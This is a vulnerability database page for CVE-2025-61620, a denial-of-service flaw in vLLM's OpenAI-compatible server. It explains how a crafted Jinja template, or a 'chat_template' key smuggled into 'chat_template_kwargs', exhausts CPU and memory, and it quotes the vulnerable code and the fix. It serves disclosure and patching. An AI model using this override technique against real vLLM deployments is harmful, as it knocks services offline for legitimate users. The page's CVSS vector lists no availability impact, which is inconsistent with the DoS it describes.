Home > Vulnerability Database > CVE-2025-61620

Mend.io Vulnerability Database

CVE-2025-61620

Good to know:

Date: November 3, 2025

Summary A resource-exhaustion (denial-of-service) vulnerability exists in multiple endpoints of the OpenAI-Compatible Server due to the ability to specify Jinja templates via the "chat_template" and "chat_template_kwargs" parameters. If an attacker can supply these parameters to the API, they can cause a service outage by exhausting CPU and/or memory resources. Details When using an LLM as a chat model, the conversation history must be rendered into a text input for the model. In "hf/transformer", this rendering is performed using a Jinja template. The OpenAI-Compatible Server launched by vllm serve exposes a "chat_template" parameter that lets users specify that template. In addition, the server accepts a "chat_template_kwargs" parameter to pass extra keyword arguments to the rendering function. Because Jinja templates support programming-language-like constructs (loops, nested iterations, etc.), a crafted template can consume extremely large amounts of CPU and memory and thereby trigger a denial-of-service condition. Importantly, simply forbidding the "chat_template" parameter does not fully mitigate the issue. The implementation constructs a dictionary of keyword arguments for "apply_hf_chat_template" and then updates that dictionary with the user-supplied "chat_template_kwargs" via "dict.update". Since "dict.update" can overwrite existing keys, an attacker can place a "chat_template" key inside "chat_template_kwargs" to replace the template that will be used by "apply_hf_chat_template". vllm/entrypoints/openai/serving_engine.py#L794-L816 _chat_template_kwargs: dict[str, Any] = dict( chat_template=chat_template, add_generation_prompt=add_generation_prompt, continue_final_message=continue_final_message, tools=tool_dicts, documents=documents, ) _chat_template_kwargs.update(chat_template_kwargs or {}) request_prompt: Union[str, list[int]] if isinstance(tokenizer, MistralTokenizer): ... else: request_prompt = apply_hf_chat_template( tokenizer=tokenizer, conversation=conversation, model_config=model_config, **_chat_template_kwargs, ) Impact If an OpenAI-Compatible Server exposes endpoints that accept "chat_template" or "chat_template_kwargs" from untrusted clients, an attacker can submit a malicious Jinja template (directly or by overriding "chat_template" inside "chat_template_kwargs") that consumes excessive CPU and/or memory. This can result in a resource-exhaustion denial-of-service that renders the server unresponsive to legitimate requests. Fixes * https://github.com/vllm-project/vllm/pull/25794

Severity Score

3.3

Related Resources (6)

Url: https://nvd.nist.gov/vuln/detail/CVE-2025-61620

Url: https://github.com/vllm-project/vllm/security/advisories/GHSA-6fvq-23cw-5628

Url: https://github.com/vllm-project/vllm/pull/25794

Url: https://github.com/vllm-project/vllm/commit/7977e5027c2250a4abc1f474c5619c40b4e5682f

Url: https://github.com/vllm-project/vllm

Url: https://www.mend.io/vulnerability-database/CVE-2025-61620

Severity Score

3.3

Weakness Type (CWE)

Improper Input Validation

CWE-20

Uncontrolled Resource Consumption

CWE-400

Allocation of Resources Without Limits or Throttling

CWE-770

Top Fix

Upgrade Version

Upgrade to version vllm - 0.11.0

Learn More

CVSS v3.1

Base Score:	3.3
Attack Vector (AV):	LOCAL
Attack Complexity (AC):	LOW
Privileges Required (PR):	LOW
User Interaction (UI):	NONE
Scope (S):	UNCHANGED
Confidentiality (C):	LOW
Integrity (I):	NONE
Availability (A):	NONE

Mend.io Vulnerability Database

We found results for “”

CVE-2025-61620

Good to know:

Date: November 3, 2025

Severity Score

Related Resources (6)

Severity Score

Weakness Type (CWE)

Top Fix

Upgrade Version

CVSS v3.1

Do you need more information?